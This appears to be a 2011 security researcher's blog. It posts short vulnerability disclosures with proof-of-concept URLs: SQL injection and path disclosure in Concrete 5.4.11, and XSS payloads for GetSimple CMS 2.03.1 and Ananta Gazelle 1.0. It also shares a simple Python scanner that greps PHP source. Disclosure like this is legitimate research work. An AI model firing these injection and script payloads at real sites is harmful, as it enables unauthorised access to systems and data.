Monday 21 November 2011

Fuzzing time

Its 3:44 AM ...


I connect my tool to src audit (next version of script described few posts ago) and one of proxy program.
Results: 23 vulnerabilities found: 6 SQL Injections and XSS (few stored) and...
I will post it here as soon as Vendors answers me. And...

Its 3:46 AM... ;)

Saturday 19 November 2011

SQLi/Info Disclo in Concrete 5.4.11


Another old bug...

# --------------------------------------------------------------------------- #
# - Title      : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on      : Ubuntu
# - Date      : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #

1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. Thats it!

* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .

GetSimple CMS 2.03.1 XSS


Some old info that I found on my other disk. Enjoy:

# --------------------------------------------------------------------------- #
# - Title      : GetSimple CMS 2.03.1
# - Tested on      : Ubuntu
# - Date      : 24/27.o3.2o11
# - Download Link : @sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #


czw, 24 mar 2011, 22:05:57 CET
Get Simple CMS 2.03.1

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/edit.php
'Create New Page'
post in title "><script> and view


27.o3.2o11 GetSimple 2.03.1 XSS for logged (http://www.cagintranetworks.com/)

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/theme.php
vulnerable param:
$template="><script>alert(2)</script>


regards,

Simple "scanner" from PentestMag

I decide to publish this simple source code scanner.
I sent it to article in Pentest Magazine first, but now I'm working on better version, so maybe this one will help somebody :)


Idea is simple: do some 'grep' tricks, and write it as an output.html :)
# ---------------------------------------------------
# knewme.py @ 2o11 - v3
# ---------------------------------------------------
# This is a sample 'dirty hack' for php src audit.
#
# dated :
#  xx.o9.2o11 + ...?
#  28.o9.2o11 + php files 'founded'
#  27.o9.2o11 + output.html
#       + project started
#----------------------------------------------------
# run: python knewme.py /dir/with/files/in/php/
# hf o/
#

import sys        # arg
import glob        # list files end elemIT
import getopt        # opts implementation
# --------------------------------------------------
# argvs
try:
  opts, args = getopt.getopt(sys.argv[1:], "hdf:v", ["help","dir=","file="])
except getopt.GetoptError, err:
  print str(err)
  print "Ups... ;C Try with -h;)"
  sys.exit(2)

verbose = False
for o, a in opts:
  if o == "-v":
    verbose = True
  elif o in ("-h","--help"):
    print ""
    print "\t-----------------------------"
    print "\t[<>] knewme.py @ 2o11.v3 [<>]"
    print "\t-----------------------------"
    print "try this way:"
    print "\t-d /dir/where/you/wanna/find/phps"
    print "\t-f /dir/where/is/your/file.php"
    print "\t-h thats me!"
    print "\n[~] try again ;)"
   
  elif o in ("-d","--dir"):
    path = sys.argv[2] +"*.php"    # updated by glob() 28.o9 to find .phps
    logfile = open('dir_check.log','w')
    for stri in glob.glob(path):
      log = logfile.write(stri)  # ---| these 2 lines log to file $logfile
      log = logfile.write("\n")  # ---|
    logfile.close()
    print ("[+] List of php files founded at "+path+" are noted in [dir_check.log]")
    print "[i] You should test it manualy now."
    sys.exit()
  elif o in ("-f","--file"):
    path = sys.argv[2]       # = argv[1]
    filek = open(path, 'r')      #   read mode
    stri = filek.readlines()    #
    filek.close()        # close the file (its already 'readed'

    print " <html><head><title> KnewMe Project @ 2011 - This is Your Rerport</title></head>"
    print " <body><br>"
    print " <center><b><h1> KnewMe Project @ 2011 <br></b><center></h1>"
    print "<b><p align=\"left\"><br>[+] Now checking file: ", filek.name
    print "</b>"
   
    vulnlist = open('vuln.php_list','r')
    for vulnline in vulnlist:
      print ("<b><p align=\"left\">[+] Possible vulnerable function name is : <font color=\"red\"> "+vulnline+" </font> </p></b>")

      i=1
      v = vulnline.strip()
      for line in stri:                        # for $line.find(?) in str=filedsk
        if line.find(v) != -1:
              print ""
              print " <table border=\"1\">"
              print "         <tr bgcolor=\"teal\">"
              print "                 <th>line</td><td>check this</th>"
              print "         </tr><tr bgcolor=\"white\">"
              print ("                <td> %d </td><td> %s </td>") % (i,line)
              print "<br>"
              print "         </tr>"
              print " </table>"
              print "</body></html>"
        i+=1
      # ----------------------------------------------------------- end of for...
 
      print "<b>---------------[ END of this test HERE ] ---------------</br>"
  # --------------------------------------------------------------------end of for...

#      print ""
#      print "[+] vulnerable function list : vuln.php_list"
#     print ""
  # -- end of last elif
  else:
    assert False, "unhandled option"

I will be glad if it helps someone to better understand Python :)

If You have any questions, feel free to ask.


Monday 14 November 2011

Ananta Gazelle1.0 CMS XSS

This is very nice CMS. But there is a nice XSS too ;)

Go to:

http://Ananta_Gazelle1.0/search.php?lookup=">:)<here:)>alert(1)</here:)>

Updated Resume

Enjoy my updated resume.



Many thanks to Gyn. ;)